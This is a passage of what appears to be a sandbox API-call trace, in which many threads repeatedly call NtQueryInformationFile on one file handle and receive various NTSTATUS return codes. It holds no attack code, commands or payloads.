Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x436fcd0, FileInformation=0x44d8098) returned 0xc0000002 Thread: id = 1700 os_tid = 0xa78 [0154.462] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x48afa00, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x48afa00, FileInformation=0x44d8098) returned 0xc0000002 Thread: id = 1701 os_tid = 0x7a8 [0154.464] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x436f9a0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x436f9a0, FileInformation=0x44d8098) returned 0x0 Thread: id = 1702 os_tid = 0x330 [0154.466] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47bfd98, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47bfd98, FileInformation=0x44d8098) returned 0xc0000003 Thread: id = 1703 os_tid = 0x3a4 [0154.467] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x430fd50, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x430fd50, FileInformation=0x44d8098) returned 0xc0000010 Thread: id = 1704 os_tid = 0x67c [0154.469] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x430fef0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x430fef0, FileInformation=0x44d8098) returned 0x0 Thread: id = 1705 os_tid = 0x5cc [0154.474] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x485ff20, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x485ff20, FileInformation=0x44d8098) returned 0x0 Thread: id = 1706 os_tid = 0x840 [0154.476] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x481f898, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x481f898, FileInformation=0x44d8098) returned 0x0 Thread: id = 1707 os_tid = 0x69c [0154.478] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x48bfb70, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x48bfb70, FileInformation=0x44d8098) returned 0x0 Thread: id = 1708 os_tid = 0x6f0 [0154.479] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x489ff00, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x489ff00, FileInformation=0x44d8098) returned 0x0 Thread: id = 1709 os_tid = 0x810 [0154.481] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x481fa48, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x481fa48, FileInformation=0x44d8098) returned 0xc0000003 Thread: id = 1710 os_tid = 0xa88 [0154.482] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x477fea0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x477fea0, FileInformation=0x44d8098) returned 0x0 Thread: id = 1711 os_tid = 0x43c [0154.484] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47ef7d8, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47ef7d8, FileInformation=0x44d8098) returned 0x0 Thread: id = 1712 os_tid = 0x670 [0154.486] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x479f9d8, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x479f9d8, FileInformation=0x44d8098) returned 0x0 Thread: id = 1713 os_tid = 0xa14 [0154.488] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x42ef888, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x42ef888, FileInformation=0x44d8098) returned 0xc0000010 Thread: id = 1714 os_tid = 0x990 [0154.490] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x42ef938, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x42ef938, FileInformation=0x44d8098) returned 0x0 Thread: id = 1715 os_tid = 0x2dc [0154.492] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x430fd38, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x430fd38, FileInformation=0x44d8098) returned 0x0 Thread: id = 1716 os_tid = 0x74c [0154.494] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x430fc30, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x430fc30, FileInformation=0x44d8098) returned 0xc0000003 Thread: id = 1717 os_tid = 0x3c4 [0154.495] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x481f840, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x481f840, FileInformation=0x44d8098) returned 0xc0000002 Thread: id = 1718 os_tid = 0x90 [0154.497] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x492f958, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x492f958, FileInformation=0x44d8098) returned 0xc0000002 Thread: id = 1719 os_tid = 0x630 [0154.499] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x478fec0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x478fec0, FileInformation=0x44d8098) returned 0xc0000002 Thread: id = 1720 os_tid = 0x124 [0154.500] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x494fcb8, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x494fcb8, FileInformation=0x44d8098) returned 0x0 Thread: id = 1721 os_tid = 0xc0 [0154.502] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x488fc98, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x488fc98, FileInformation=0x44d8098) returned 0xc0000002 Thread: id = 1722 os_tid = 0x360 [0154.504] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x42efe30, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x42efe30, FileInformation=0x44d8098) returned 0xc0000002 Thread: id = 1723 os_tid = 0x920 [0154.511] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x482fbe8, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x482fbe8, FileInformation=0x44d8098) returned 0xc0000002 Thread: id = 1724 os_tid = 0xbec [0154.513] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x484ff28, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x484ff28, FileInformation=0x44d8098) returned 0xc0000002 Thread: id = 1725 os_tid = 0x6b8 [0154.516] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x485f940, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x485f940, FileInformation=0x44d8098) returned 0xc0000002 Thread: id = 1726 os_tid = 0x30c [0154.518] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x490fb78, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x490fb78, FileInformation=0x44d8098) returned 0xc0000002 Thread: id = 1727 os_tid = 0xbfc [0154.520] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x486fce0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x486fce0, FileInformation=0x44d8098) returned 0x0 Thread: id = 1728 os_tid = 0x3f8 [0154.521] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47bfbe0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47bfbe0, FileInformation=0x44d8098) returned 0x0 Thread: id = 1729 os_tid = 0x6cc [0154.523] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x478fcb8, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x478fcb8, FileInformation=0x44d8098) returned 0x0 Thread: id = 1730 os_tid = 0x830 [0154.525] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47dfce8, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47dfce8, FileInformation=0x44d8098) returned 0x0 Thread: id = 1731 os_tid = 0x75c [0154.527] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x489ff08, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x489ff08, FileInformation=0x44d8098) returned 0xc0000003 Thread: id = 1732 os_tid = 0x7f0 [0154.529] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x482f7b0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x482f7b0, FileInformation=0x44d8098) returned 0x0 Thread: id = 1733 os_tid = 0x710 [0154.531] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x477fac0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x477fac0, FileInformation=0x44d8098) returned 0x0 Thread: id = 1734 os_tid = 0x5d8 [0154.532] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x432fdc0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x432fdc0, FileInformation=0x44d8098) returned 0x0 Thread: id = 1735 os_tid = 0xbe4 [0154.534] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x483ff28, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x483ff28, FileInformation=0x44d8098) returned 0x0 Thread: id = 1736 os_tid = 0x600 [0154.537] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47efe48, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47efe48, FileInformation=0x44d8098) returned 0x0 Thread: id = 1737 os_tid = 0xbd0 [0154.538] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x48bfd58, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x48bfd58, FileInformation=0x44d8098) returned 0x0 Thread: id = 1738 os_tid = 0x158 [0154.540] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x483f918, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x483f918, FileInformation=0x44d8098) returned 0xc0000002 Thread: id = 1739 os_tid = 0xbd8 [0154.541] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x479f8a8, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x479f8a8, FileInformation=0x44d8098) returned 0x0 Thread: id = 1740 os_tid = 0xbe8 [0154.543] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x477f7a8, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x477f7a8, FileInformation=0x44d8098) returned 0x0 Thread: id = 1741 os_tid = 0xbdc [0154.545] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x488fda0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x488fda0, FileInformation=0x44d8098) returned 0xc0000002 Thread: id = 1742 os_tid = 0x5b4 [0154.546] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x479f9a0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x479f9a0, FileInformation=0x44d8098) returned 0xc0000002 Thread: id = 1743 os_tid = 0x614 [0154.548] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x479fb28, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x479fb28, FileInformation=0x44d8098) returned 0xc0000002 Thread: id = 1744 os_tid = 0x690 [0154.550] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x484fb10, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x484fb10, FileInformation=0x44d8098) returned 0x0 Thread: id = 1745 os_tid = 0xa68 [0154.551] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x476fe58, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x476fe58, FileInformation=0x44d8098) returned 0x0 Thread: id = 1746 os_tid = 0x7d0 [0154.553] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x490fa78, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x490fa78, FileInformation=0x44d8098) returned 0x0 Thread: id = 1747 os_tid = 0x7d8 [0154.555] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x432fee8, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x432fee8, FileInformation=0x44d8098) returned 0x0 Thread: id = 1748 os_tid = 0x24c [0154.556] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x479f7d8, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x479f7d8, FileInformation=0x44d8098) returned 0x0 Thread: id = 1749 os_tid = 0x9f8 [0154.558] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x477fdf0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x477fdf0, FileInformation=0x44d8098) returned 0x0 Thread: id = 1750 os_tid = 0x798 [0154.559] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x487ff40, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x487ff40, FileInformation=0x44d8098) returned 0x0 Thread: id = 1751 os_tid = 0xa3c [0154.561] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x483fb30, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x483fb30, FileInformation=0x44d8098) returned 0x0 Thread: id = 1752 os_tid = 0x8c0 [0154.563] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x48ef788, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x48ef788, FileInformation=0x44d8098) returned 0x0 Thread: id = 1753 os_tid = 0x708 [0154.565] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x487fce8, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x487fce8, FileInformation=0x44d8098) returned 0x0 Thread: id = 1754 os_tid = 0xa64 [0154.566] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x42efbf8, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x42efbf8, FileInformation=0x44d8098) returned 0x0 Thread: id = 1755 os_tid = 0xa30 [0154.568] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x42efe38, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x42efe38, FileInformation=0x44d8098) returned 0xc0000010 Thread: id = 1756 os_tid = 0x388 [0154.569] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x299f9e0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x299f9e0, FileInformation=0x44d8098) returned 0xc0000010 Thread: id = 1757 os_tid = 0x760 [0154.571] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x297fe48, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x297fe48, FileInformation=0x44d8098) returned 0xc0000010 Thread: id = 1758 os_tid = 0xa54 [0154.572] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47dfec8, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47dfec8, FileInformation=0x44d8098) returned 0xc0000010 Thread: id = 1759 os_tid = 0x738 [0154.574] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x481fad0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x481fad0, FileInformation=0x44d8098) returned 0xc0000002 Thread: id = 1760 os_tid = 0x488 [0154.575] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x436f9a8, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x436f9a8, FileInformation=0x44d8098) returned 0xc0000002 Thread: id = 1761 os_tid = 0x6dc [0154.577] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x436ff50, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x436ff50, FileInformation=0x44d8098) returned 0x0 Thread: id = 1762 os_tid = 0x7a0 [0154.578] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x485fe38, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x485fe38, FileInformation=0x44d8098) returned 0x0 Thread: id = 1763 os_tid = 0x73c [0154.607] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47bfcc8, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47bfcc8, FileInformation=0x44d8098) returned 0x0 Thread: id = 1764 os_tid = 0x1c0 [0154.609] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47ffaa8, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47ffaa8, FileInformation=0x44d8098) returned 0x0 Thread: id = 1765 os_tid = 0x7c4 [0154.610] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x477fbe0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x477fbe0, FileInformation=0x44d8098) returned 0x0 Thread: id = 1766 os_tid = 0x790 [0154.612] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x434f7e8, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x434f7e8, FileInformation=0x44d8098) returned 0x0 Thread: id = 1767 os_tid = 0x688 [0154.614] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x436ff28, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x436ff28, FileInformation=0x44d8098) returned 0x0 Thread: id = 1768 os_tid = 0x240 [0154.615] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x477fd58, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x477fd58, FileInformation=0x44d8098) returned 0x0 Thread: id = 1769 os_tid = 0x8e0 [0154.618] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x481f8b8, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x481f8b8, FileInformation=0x44d8098) returned 0x0 Thread: id = 1770 os_tid = 0x880 [0154.620] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x485fdf8, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x485fdf8, FileInformation=0x44d8098) returned 0x0 Thread: id = 1771 os_tid = 0x8f0 [0154.622] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x436fa00, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x436fa00, FileInformation=0x44d8098) returned 0x0 Thread: id = 1772 os_tid = 0xa18 [0154.624] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x42ef9e0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x42ef9e0, FileInformation=0x44d8098) returned 0x0 Thread: id = 1773 os_tid = 0x8a0 [0154.625] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x297ff50, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x297ff50, FileInformation=0x44d8098) returned 0x0 Thread: id = 1774 os_tid = 0x870 [0154.628] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x297fe48, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x297fe48, FileInformation=0x44d8098) returned 0x0 Thread: id = 1775 os_tid = 0x2c4 [0154.629] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x42eff68, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x42eff68, FileInformation=0x44d8098) returned 0x0 Thread: id = 1776 os_tid = 0x890 [0154.632] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x483fa98, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x483fa98, FileInformation=0x44d8098) returned 0x0 Thread: id = 1777 os_tid = 0x4e8 [0154.634] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x479fe60, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x479fe60, FileInformation=0x44d8098) returned 0x0 Thread: id = 1778 os_tid = 0xcc [0154.636] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x485fa50, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x485fa50, FileInformation=0x44d8098) returned 0x0 Thread: id = 1779 os_tid = 0xd0 [0154.638] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x432fab8, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x432fab8, FileInformation=0x44d8098) returned 0x0 Thread: id = 1780 os_tid = 0xd4 [0154.639] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x483f8d0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x483f8d0, FileInformation=0x44d8098) returned 0x0 Thread: id = 1781 os_tid = 0xd8 [0154.641] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x485fc38, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x485fc38, FileInformation=0x44d8098) returned 0x0 Thread: id = 1782 os_tid = 0xdc [0154.643] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x481f880, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x481f880, FileInformation=0x44d8098) returned 0x0 Thread: id = 1783 os_tid = 0xe0 [0154.649] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x477fe80, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x477fe80, FileInformation=0x44d8098) returned 0x0 Thread: id = 1784 os_tid = 0xe4 [0154.651] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x483f9b0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x483f9b0, FileInformation=0x44d8098) returned 0x0 Thread: id = 1785 os_tid = 0xe8 [0154.653] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x479fea8, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x479fea8, FileInformation=0x44d8098) returned 0x0 Thread: id = 1786 os_tid = 0xec [0154.654] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x477f948, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x477f948, FileInformation=0x44d8098) returned 0xc0000010 Thread: id = 1787 os_tid = 0x748 [0154.656] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x485f8f0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x485f8f0, FileInformation=0x44d8098) returned 0xc0000010 Thread: id = 1788 os_tid = 0xc4 [0154.659] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x42ef990, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x42ef990, FileInformation=0x44d8098) returned 0x0 Thread: id = 1789 os_tid = 0x620 [0154.662] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x430fa38, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x430fa38, FileInformation=0x44d8098) returned 0x0 Thread: id = 1790 os_tid = 0x910 [0154.663] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x477fb80, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x477fb80, FileInformation=0x44d8098) returned 0x0 Thread: id = 1791 os_tid = 0x950 [0154.665] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x436fe48, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x436fe48, FileInformation=0x44d8098) returned 0x0 Thread: id = 1792 os_tid = 0x940 [0154.667] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x481fac8, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x481fac8, FileInformation=0x44d8098) returned 0x0 Thread: id = 1793 os_tid = 0x980 [0154.669] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x434ff50, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x434ff50, FileInformation=0x44d8098) returned 0x0 Thread: id = 1794 os_tid = 0xa10 [0154.670] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x483fb98, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x483fb98, FileInformation=0x44d8098) returned 0x0 Thread: id = 1795 os_tid = 0x72c [0154.673] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x432fb20, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x432fb20, FileInformation=0x44d8098) returned 0xc0000003 Thread: id = 1796 os_tid = 0x9e0 [0154.675] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x297fd08, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x297fd08, FileInformation=0x44d8098) returned 0xc0000010 Thread: id = 1797 os_tid = 0x9c4 [0154.677] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x434fe60, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x434fe60, FileInformation=0x44d8098) returned 0xc0000010 Thread: id = 1798 os_tid = 0xa6c [0154.678] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x436fd08, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x436fd08, FileInformation=0x44d8098) returned 0xc0000010 Thread: id = 1799 os_tid = 0xb00 [0154.680] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47bfcf8, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47bfcf8, FileInformation=0x44d8098) returned 0x0 Thread: id = 1800 os_tid = 0xaf8 [0154.681] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x434fb18, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x434fb18, FileInformation=0x44d8098) returned 0x0 Thread: id = 1801 os_tid = 0xae4 [0154.683] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x483fde8, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x483fde8, FileInformation=0x44d8098) returned 0x0 Thread: id = 1802 os_tid = 0x344 [0154.685] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x42ef8c8, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x42ef8c8, FileInformation=0x44d8098) returned 0xc000000d Thread: id = 1803 os_tid = 0x808 [0154.686] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x432f7c8, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x432f7c8, FileInformation=0x44d8098) returned 0x0 Thread: id = 1804 os_tid = 0x858 [0154.688] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x432f7a0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x432f7a0, FileInformation=0x44d8098) returned 0x0 Thread: id = 1805 os_tid = 0x224 [0154.690] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x483fbe0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x483fbe0, FileInformation=0x44d8098) returned 0x0 Thread: id = 1806 os_tid = 0x4dc [0154.692] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x479fd88, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x479fd88, FileInformation=0x44d8098) returned 0x0 Thread: id = 1807 os_tid = 0x78c 